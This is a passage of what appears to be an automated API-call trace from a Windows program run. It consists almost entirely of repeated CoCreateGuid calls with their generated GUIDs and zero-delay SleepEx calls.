[5]=0xcd, [6]=0x93, [7]=0x1b))) returned 0x0 [0244.718] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc78ac68e, Data2=0x2401, Data3=0x4f42, Data4=([0]=0xad, [1]=0x70, [2]=0xd3, [3]=0x84, [4]=0x29, [5]=0x35, [6]=0xcc, [7]=0x39))) returned 0x0 [0244.719] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3441d15f, Data2=0xd03f, Data3=0x4af0, Data4=([0]=0x9d, [1]=0xc, [2]=0x8b, [3]=0xee, [4]=0x2b, [5]=0x91, [6]=0x84, [7]=0xb5))) returned 0x0 [0244.720] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x64d92c56, Data2=0x58fc, Data3=0x4545, Data4=([0]=0xa1, [1]=0x14, [2]=0x59, [3]=0x8c, [4]=0x76, [5]=0x90, [6]=0x86, [7]=0x92))) returned 0x0 [0244.721] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7eb6346c, Data2=0x5645, Data3=0x49cb, Data4=([0]=0x8f, [1]=0x3f, [2]=0xf7, [3]=0x65, [4]=0xf1, [5]=0xb, [6]=0xa1, [7]=0x69))) returned 0x0 [0244.723] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc729b896, Data2=0xc1d0, Data3=0x42f9, Data4=([0]=0x9e, [1]=0x22, [2]=0x5b, [3]=0x87, [4]=0xc1, [5]=0xab, [6]=0xd1, [7]=0xe1))) returned 0x0 [0244.725] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe8950c25, Data2=0x8f56, Data3=0x4757, Data4=([0]=0xb8, [1]=0xfa, [2]=0x92, [3]=0xb1, [4]=0xc2, [5]=0xbf, [6]=0x29, [7]=0x62))) returned 0x0 [0244.727] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x597a046b, Data2=0xf8de, Data3=0x40e1, Data4=([0]=0x83, [1]=0x30, [2]=0x86, [3]=0x4d, [4]=0x5e, [5]=0x31, [6]=0xd4, [7]=0x90))) returned 0x0 [0244.729] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd43e22ff, Data2=0x309, Data3=0x4789, Data4=([0]=0x82, [1]=0xb0, [2]=0xa7, [3]=0x56, [4]=0xf5, [5]=0x98, [6]=0x91, [7]=0xe4))) returned 0x0 [0244.730] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3f1d85a1, Data2=0x88c2, Data3=0x4fb5, Data4=([0]=0x94, [1]=0xc8, [2]=0xac, [3]=0xa1, [4]=0xa5, [5]=0xc7, [6]=0xd1, [7]=0x5b))) returned 0x0 [0244.731] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6229a090, Data2=0xdc0c, Data3=0x4144, Data4=([0]=0x89, [1]=0xf3, [2]=0x99, [3]=0x7f, [4]=0x60, [5]=0x69, [6]=0xf8, [7]=0xee))) returned 0x0 [0244.732] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe5e1f0e7, Data2=0xc5dc, Data3=0x4bff, Data4=([0]=0x9f, [1]=0xf, [2]=0xc9, [3]=0xab, [4]=0xca, [5]=0x71, [6]=0x87, [7]=0x61))) returned 0x0 [0244.733] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb6e9319c, Data2=0x9bba, Data3=0x443f, Data4=([0]=0xa2, [1]=0xa5, [2]=0x94, [3]=0x77, [4]=0x0, [5]=0xe7, [6]=0xd, [7]=0x0))) returned 0x0 [0244.734] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbaa42b7c, Data2=0xd419, Data3=0x4d5f, Data4=([0]=0x9e, [1]=0x89, [2]=0x96, [3]=0xe7, [4]=0x44, [5]=0xef, [6]=0x65, [7]=0x6c))) returned 0x0 [0244.735] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9312e708, Data2=0x7cb9, Data3=0x4b6e, Data4=([0]=0xac, [1]=0x7, [2]=0x5, [3]=0xd6, [4]=0xa4, [5]=0xb4, [6]=0x6b, [7]=0xa7))) returned 0x0 [0244.736] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfde2e3c2, Data2=0xdaa7, Data3=0x447b, Data4=([0]=0x81, [1]=0xfd, [2]=0x73, [3]=0x61, [4]=0xb6, [5]=0x75, [6]=0xff, [7]=0xaf))) returned 0x0 [0244.737] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x20cca06, Data2=0xf50, Data3=0x4bcd, Data4=([0]=0x8d, [1]=0x71, [2]=0x55, [3]=0x68, [4]=0xa6, [5]=0xaa, [6]=0xaf, [7]=0xdb))) returned 0x0 [0244.737] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe59106c4, Data2=0xc480, Data3=0x4513, Data4=([0]=0x98, [1]=0x81, [2]=0xa3, [3]=0x6f, [4]=0x9a, [5]=0x0, [6]=0x10, [7]=0x19))) returned 0x0 [0244.737] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x540f98a, Data2=0xbfc0, Data3=0x4cf5, Data4=([0]=0x8a, [1]=0xba, [2]=0x66, [3]=0x53, [4]=0x8d, [5]=0xd7, [6]=0xe1, [7]=0x63))) returned 0x0 [0244.739] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x92c25878, Data2=0x10fc, Data3=0x4982, Data4=([0]=0x8f, [1]=0xb4, [2]=0xa3, [3]=0xc3, [4]=0x3a, [5]=0x15, [6]=0x9d, [7]=0xb5))) returned 0x0 [0244.740] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb1594bd0, Data2=0x8703, Data3=0x45c1, Data4=([0]=0x81, [1]=0x4, [2]=0xc3, [3]=0xf, [4]=0xe8, [5]=0x92, [6]=0x28, [7]=0x4f))) returned 0x0 [0244.740] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x263bca9e, Data2=0xc9b9, Data3=0x44d1, Data4=([0]=0x85, [1]=0xc7, [2]=0x92, [3]=0x93, [4]=0xdb, [5]=0x36, [6]=0x10, [7]=0xb0))) returned 0x0 [0244.740] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7deb4aa0, Data2=0x864a, Data3=0x4ad3, Data4=([0]=0x86, [1]=0xd8, [2]=0x4b, [3]=0x16, [4]=0x8a, [5]=0x7b, [6]=0xc3, [7]=0xbc))) returned 0x0 [0244.741] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x78f0a3d6, Data2=0x42eb, Data3=0x46ce, Data4=([0]=0xb3, [1]=0xff, [2]=0x21, [3]=0xdb, [4]=0x23, [5]=0x35, [6]=0x8f, [7]=0x27))) returned 0x0 [0244.741] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbe4c35e, Data2=0x44e1, Data3=0x4ee2, Data4=([0]=0x9f, [1]=0xed, [2]=0x6f, [3]=0x70, [4]=0x57, [5]=0x31, [6]=0x81, [7]=0x97))) returned 0x0 [0244.741] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1a54d46d, Data2=0x8d5, Data3=0x40f4, Data4=([0]=0xb7, [1]=0x19, [2]=0x17, [3]=0xfa, [4]=0x44, [5]=0x70, [6]=0x57, [7]=0xe))) returned 0x0 [0244.741] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4015b12b, Data2=0x85a, Data3=0x41b9, Data4=([0]=0x83, [1]=0xe2, [2]=0xa6, [3]=0xf4, [4]=0xaf, [5]=0xb, [6]=0x7f, [7]=0xe9))) returned 0x0 [0244.742] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa223aa6c, Data2=0xd93c, Data3=0x4b45, Data4=([0]=0xa9, [1]=0x70, [2]=0x23, [3]=0x8, [4]=0xdd, [5]=0x99, [6]=0xa7, [7]=0x30))) returned 0x0 [0244.742] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1a79d694, Data2=0x4207, Data3=0x4562, Data4=([0]=0x99, [1]=0x55, [2]=0x44, [3]=0x5c, [4]=0x7d, [5]=0x45, [6]=0xf1, [7]=0x47))) returned 0x0 [0244.742] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb79b4f33, Data2=0x679b, Data3=0x4185, Data4=([0]=0x8e, [1]=0xb0, [2]=0x9f, [3]=0x31, [4]=0x77, [5]=0xf8, [6]=0x5a, [7]=0xd9))) returned 0x0 [0244.743] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4ad84776, Data2=0x6e85, Data3=0x41c2, Data4=([0]=0xa9, [1]=0x4b, [2]=0x3e, [3]=0xc8, [4]=0xf7, [5]=0xde, [6]=0x38, [7]=0x11))) returned 0x0 [0244.743] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xef74e283, Data2=0xb8bb, Data3=0x421e, Data4=([0]=0x96, [1]=0x9f, [2]=0x49, [3]=0x30, [4]=0xcd, [5]=0x49, [6]=0x5c, [7]=0x79))) returned 0x0 [0244.743] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfa1c3a7e, Data2=0x158e, Data3=0x43e0, Data4=([0]=0x81, [1]=0x7e, [2]=0x58, [3]=0x9d, [4]=0xde, [5]=0xaf, [6]=0x5b, [7]=0xb))) returned 0x0 [0244.744] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x3ebcc505, Data2=0xb27f, Data3=0x4f31, Data4=([0]=0xa8, [1]=0xe0, [2]=0x1b, [3]=0xc4, [4]=0xd8, [5]=0x3b, [6]=0x88, [7]=0xc))) returned 0x0 [0244.744] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeb71dcbe, Data2=0x423e, Data3=0x4187, Data4=([0]=0x9c, [1]=0x78, [2]=0x4b, [3]=0x27, [4]=0xfb, [5]=0x54, [6]=0x35, [7]=0x32))) returned 0x0 [0244.744] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x81e79f32, Data2=0x70b7, Data3=0x42dc, Data4=([0]=0xb8, [1]=0xf8, [2]=0x9d, [3]=0xbd, [4]=0x7b, [5]=0x1b, [6]=0x77, [7]=0xe9))) returned 0x0 [0244.745] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1e82154a, Data2=0xea2, Data3=0x4bb5, Data4=([0]=0x90, [1]=0xca, [2]=0xb1, [3]=0x34, [4]=0xa3, [5]=0x83, [6]=0xca, [7]=0x47))) returned 0x0 [0244.745] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xafe80ecc, Data2=0xd02b, Data3=0x4df5, Data4=([0]=0x9e, [1]=0xf1, [2]=0xd0, [3]=0xf9, [4]=0x46, [5]=0xfe, [6]=0x89, [7]=0x36))) returned 0x0 [0244.745] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8cd1ac9, Data2=0xf7cb, Data3=0x420f, Data4=([0]=0x9f, [1]=0xc, [2]=0x24, [3]=0xec, [4]=0x16, [5]=0x67, [6]=0xfa, [7]=0x42))) returned 0x0 [0244.745] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x99fc51a2, Data2=0x3fad, Data3=0x4fe9, Data4=([0]=0xbe, [1]=0x32, [2]=0x56, [3]=0x35, [4]=0x38, [5]=0xa3, [6]=0xe1, [7]=0x31))) returned 0x0 [0244.746] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xba55b3b2, Data2=0xc1c8, Data3=0x438e, Data4=([0]=0x8b, [1]=0x8e, [2]=0xb3, [3]=0x64, [4]=0xdf, [5]=0x98, [6]=0x11, [7]=0x1e))) returned 0x0 [0244.746] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x587d652f, Data2=0x6c56, Data3=0x485e, Data4=([0]=0xb6, [1]=0xeb, [2]=0x4e, [3]=0x43, [4]=0x6c, [5]=0x79, [6]=0x5, [7]=0xe2))) returned 0x0 [0244.746] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeff61c19, Data2=0xf4f8, Data3=0x43a5, Data4=([0]=0xad, [1]=0xea, [2]=0xb6, [3]=0x9c, [4]=0xad, [5]=0x29, [6]=0x39, [7]=0x4c))) returned 0x0 [0244.747] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7e25c7a0, Data2=0xfff2, Data3=0x4283, Data4=([0]=0x8d, [1]=0x58, [2]=0xf7, [3]=0xf7, [4]=0x91, [5]=0x36, [6]=0x43, [7]=0x7d))) returned 0x0 [0244.747] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa8da2fc1, Data2=0xebc4, Data3=0x4d96, Data4=([0]=0xbe, [1]=0x3, [2]=0xea, [3]=0xfa, [4]=0x61, [5]=0x2c, [6]=0xa3, [7]=0x72))) returned 0x0 [0244.747] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfff05249, Data2=0x7409, Data3=0x4ca8, Data4=([0]=0x83, [1]=0x61, [2]=0xa, [3]=0x5f, [4]=0x7d, [5]=0x1a, [6]=0xf6, [7]=0x6c))) returned 0x0 [0244.747] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x31f51d8, Data2=0xb0ab, Data3=0x4897, Data4=([0]=0xbe, [1]=0x71, [2]=0xc5, [3]=0x8a, [4]=0xfd, [5]=0x1e, [6]=0xa1, [7]=0xc0))) returned 0x0 [0244.747] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x16e2cc0e, Data2=0x465b, Data3=0x4162, Data4=([0]=0xa9, [1]=0x88, [2]=0xa2, [3]=0xdf, [4]=0x4d, [5]=0x9b, [6]=0x4f, [7]=0xa8))) returned 0x0 [0244.748] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd8960e16, Data2=0xb8d6, Data3=0x4da5, Data4=([0]=0x85, [1]=0x2, [2]=0x9, [3]=0x77, [4]=0x7e, [5]=0x90, [6]=0xfb, [7]=0xcf))) returned 0x0 [0244.748] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x78b66a2, Data2=0xc502, Data3=0x492f, Data4=([0]=0x95, [1]=0x53, [2]=0x3b, [3]=0x8, [4]=0x8b, [5]=0x90, [6]=0xd8, [7]=0x3e))) returned 0x0 [0244.748] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x96d8a08c, Data2=0x47fc, Data3=0x405b, Data4=([0]=0x95, [1]=0x67, [2]=0x2, [3]=0x5, [4]=0x8b, [5]=0x3a, [6]=0xc6, [7]=0x6))) returned 0x0 [0244.748] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9e24fdbf, Data2=0x2189, Data3=0x40b9, Data4=([0]=0xa3, [1]=0x64, [2]=0xdf, [3]=0xd5, [4]=0x69, [5]=0xfe, [6]=0x57, [7]=0x70))) returned 0x0 [0244.749] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5719b15d, Data2=0x83d6, Data3=0x4112, Data4=([0]=0x94, [1]=0xca, [2]=0x94, [3]=0x48, [4]=0xa1, [5]=0x6e, [6]=0x30, [7]=0x3f))) returned 0x0 [0244.749] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x831f3a38, Data2=0xe0e7, Data3=0x4b66, Data4=([0]=0x8d, [1]=0x59, [2]=0x44, [3]=0xd4, [4]=0xa0, [5]=0x61, [6]=0xed, [7]=0x27))) returned 0x0 [0244.750] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x22b9faba, Data2=0x7dc2, Data3=0x4d98, Data4=([0]=0xa5, [1]=0x6a, [2]=0x7c, [3]=0xab, [4]=0x82, [5]=0xe5, [6]=0x5, [7]=0x33))) returned 0x0 [0244.750] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x303ce2a2, Data2=0x9634, Data3=0x457c, Data4=([0]=0xb4, [1]=0x62, [2]=0x71, [3]=0xc7, [4]=0x65, [5]=0xae, [6]=0xea, [7]=0xf7))) returned 0x0 [0244.751] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1c3396da, Data2=0xe002, Data3=0x47d9, Data4=([0]=0x9b, [1]=0xef, [2]=0x59, [3]=0x2c, [4]=0xbd, [5]=0x3c, [6]=0x27, [7]=0xf6))) returned 0x0 [0244.751] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf2803e7d, Data2=0x1e2, Data3=0x45ae, Data4=([0]=0xb7, [1]=0xb5, [2]=0xeb, [3]=0xb1, [4]=0x25, [5]=0x67, [6]=0x7, [7]=0x32))) returned 0x0 [0244.751] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xcc5043fb, Data2=0xcdd8, Data3=0x49bc, Data4=([0]=0xb4, [1]=0xf0, [2]=0x39, [3]=0x2a, [4]=0x29, [5]=0x93, [6]=0x5a, [7]=0x84))) returned 0x0 [0244.752] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4239a05c, Data2=0x61a4, Data3=0x4792, Data4=([0]=0xaa, [1]=0xa8, [2]=0x35, [3]=0xa1, [4]=0x57, [5]=0x57, [6]=0x78, [7]=0xd1))) returned 0x0 [0244.752] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfedde516, Data2=0x2afa, Data3=0x4307, Data4=([0]=0xac, [1]=0xfe, [2]=0x91, [3]=0x9, [4]=0x60, [5]=0x9e, [6]=0xe7, [7]=0xa6))) returned 0x0 [0244.752] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd7720f6d, Data2=0x5047, Data3=0x469c, Data4=([0]=0x94, [1]=0x95, [2]=0x2d, [3]=0x7f, [4]=0xce, [5]=0x21, [6]=0x50, [7]=0xdb))) returned 0x0 [0244.752] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbc0d4b05, Data2=0x8a3c, Data3=0x4b54, Data4=([0]=0x85, [1]=0x66, [2]=0x4f, [3]=0xe2, [4]=0xb7, [5]=0x85, [6]=0x1b, [7]=0x69))) returned 0x0 [0244.752] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa4e65d48, Data2=0x5271, Data3=0x49fb, Data4=([0]=0x9f, [1]=0xf6, [2]=0x69, [3]=0x11, [4]=0x25, [5]=0xdc, [6]=0x62, [7]=0xcd))) returned 0x0 [0244.753] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4d7301, Data2=0x2087, Data3=0x4e2c, Data4=([0]=0xb1, [1]=0x18, [2]=0xe5, [3]=0xc1, [4]=0x6d, [5]=0x1d, [6]=0xf1, [7]=0xae))) returned 0x0 [0244.753] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf49866d0, Data2=0xc272, Data3=0x4257, Data4=([0]=0x96, [1]=0xe0, [2]=0x75, [3]=0xca, [4]=0xe4, [5]=0x6f, [6]=0xf3, [7]=0xf5))) returned 0x0 [0244.753] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc3f7ef6a, Data2=0x9fc0, Data3=0x4851, Data4=([0]=0x8b, [1]=0xbf, [2]=0x78, [3]=0x3e, [4]=0x9d, [5]=0x1f, [6]=0x1, [7]=0x18))) returned 0x0 [0244.754] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x22b7a6d1, Data2=0xdc62, Data3=0x4bc9, Data4=([0]=0x9f, [1]=0x30, [2]=0x8c, [3]=0x51, [4]=0x54, [5]=0x5d, [6]=0xdd, [7]=0x55))) returned 0x0 [0244.754] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xde4416b, Data2=0x7f2c, Data3=0x4b8e, Data4=([0]=0xa4, [1]=0x1e, [2]=0x56, [3]=0xd6, [4]=0x2a, [5]=0x71, [6]=0xe5, [7]=0x55))) returned 0x0 [0244.754] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd0a9782e, Data2=0x9fc3, Data3=0x4ab9, Data4=([0]=0xa3, [1]=0xd3, [2]=0xff, [3]=0xb, [4]=0x45, [5]=0x41, [6]=0x21, [7]=0xc7))) returned 0x0 [0244.754] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x105ad180, Data2=0xa689, Data3=0x416a, Data4=([0]=0xba, [1]=0x41, [2]=0x43, [3]=0xaa, [4]=0xe8, [5]=0xb9, [6]=0x83, [7]=0x4e))) returned 0x0 [0244.754] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8168c704, Data2=0x8383, Data3=0x46e7, Data4=([0]=0xa9, [1]=0xc2, [2]=0xc1, [3]=0xc7, [4]=0xfb, [5]=0xed, [6]=0xe9, [7]=0xd0))) returned 0x0 [0244.755] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9f3821fd, Data2=0x5bce, Data3=0x47d3, Data4=([0]=0x8a, [1]=0xcc, [2]=0x80, [3]=0x8f, [4]=0x2d, [5]=0x70, [6]=0x10, [7]=0x5))) returned 0x0 [0244.755] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xf4480647, Data2=0x42a9, Data3=0x4e9f, Data4=([0]=0x89, [1]=0x63, [2]=0x41, [3]=0x54, [4]=0x85, [5]=0x45, [6]=0x8c, [7]=0xba))) returned 0x0 [0244.755] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x60db2215, Data2=0x5c56, Data3=0x43a0, Data4=([0]=0xaa, [1]=0xc0, [2]=0x32, [3]=0x39, [4]=0x22, [5]=0xdf, [6]=0x4f, [7]=0x8d))) returned 0x0 [0244.756] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x39fb85de, Data2=0x400a, Data3=0x4241, Data4=([0]=0xa3, [1]=0x4a, [2]=0x40, [3]=0xdd, [4]=0xcb, [5]=0xa0, [6]=0x97, [7]=0x79))) returned 0x0 [0244.756] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x18a53393, Data2=0xd719, Data3=0x4311, Data4=([0]=0x9d, [1]=0x2, [2]=0x52, [3]=0x82, [4]=0xe1, [5]=0x13, [6]=0xfb, [7]=0xcf))) returned 0x0 [0244.756] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa2e11cc7, Data2=0xec96, Data3=0x4c2a, Data4=([0]=0xb9, [1]=0x3c, [2]=0xd0, [3]=0xbd, [4]=0xe1, [5]=0xb2, [6]=0x26, [7]=0x9b))) returned 0x0 [0244.756] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6c4eb344, Data2=0x797d, Data3=0x44a2, Data4=([0]=0x84, [1]=0x75, [2]=0xd9, [3]=0x83, [4]=0xf4, [5]=0x9e, [6]=0x5b, [7]=0xa9))) returned 0x0 [0244.757] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x92e85eaf, Data2=0xa8b, Data3=0x49d8, Data4=([0]=0xba, [1]=0xc2, [2]=0x99, [3]=0xcc, [4]=0xc, [5]=0xc9, [6]=0x7b, [7]=0x51))) returned 0x0 [0244.757] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7d367d8a, Data2=0x2354, Data3=0x4de0, Data4=([0]=0x86, [1]=0xed, [2]=0xd, [3]=0x34, [4]=0x9, [5]=0x22, [6]=0x42, [7]=0xb8))) returned 0x0 [0244.757] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb5996e7e, Data2=0xdcd6, Data3=0x4c2b, Data4=([0]=0xa0, [1]=0xa3, [2]=0xc6, [3]=0x40, [4]=0x3c, [5]=0xb4, [6]=0xde, [7]=0x71))) returned 0x0 [0244.758] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa428341d, Data2=0xd00e, Data3=0x4fb2, Data4=([0]=0xba, [1]=0x8c, [2]=0x3d, [3]=0xdc, [4]=0xfd, [5]=0x5, [6]=0x1d, [7]=0x44))) returned 0x0 [0244.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.875] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.067] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.039] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.889] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x44298437, Data2=0x6fae, Data3=0x45de, Data4=([0]=0xb5, [1]=0xf2, [2]=0xa5, [3]=0x66, [4]=0x5f, [5]=0x67, [6]=0x76, [7]=0xb5))) returned 0x0 [0248.890] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfb2a0443, Data2=0xcb89, Data3=0x4f36, Data4=([0]=0x99, [1]=0x6b, [2]=0x7e, [3]=0x5e, [4]=0x51, [5]=0xcb, [6]=0xad, [7]=0xb6))) returned 0x0 [0248.890] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x57b1eaea, Data2=0x2b7d, Data3=0x45bf, Data4=([0]=0x9b, [1]=0xf0, [2]=0x44, [3]=0x97, [4]=0xc2, [5]=0x5c, [6]=0xef, [7]=0xe1))) returned 0x0 [0248.890] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9254645e, Data2=0x6793, Data3=0x4726, Data4=([0]=0xb2, [1]=0x9e, [2]=0xd4, [3]=0x2, [4]=0x24, [5]=0x9c, [6]=0xbb, [7]=0xc2))) returned 0x0 [0248.891] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe3d505c3, Data2=0x2e0, 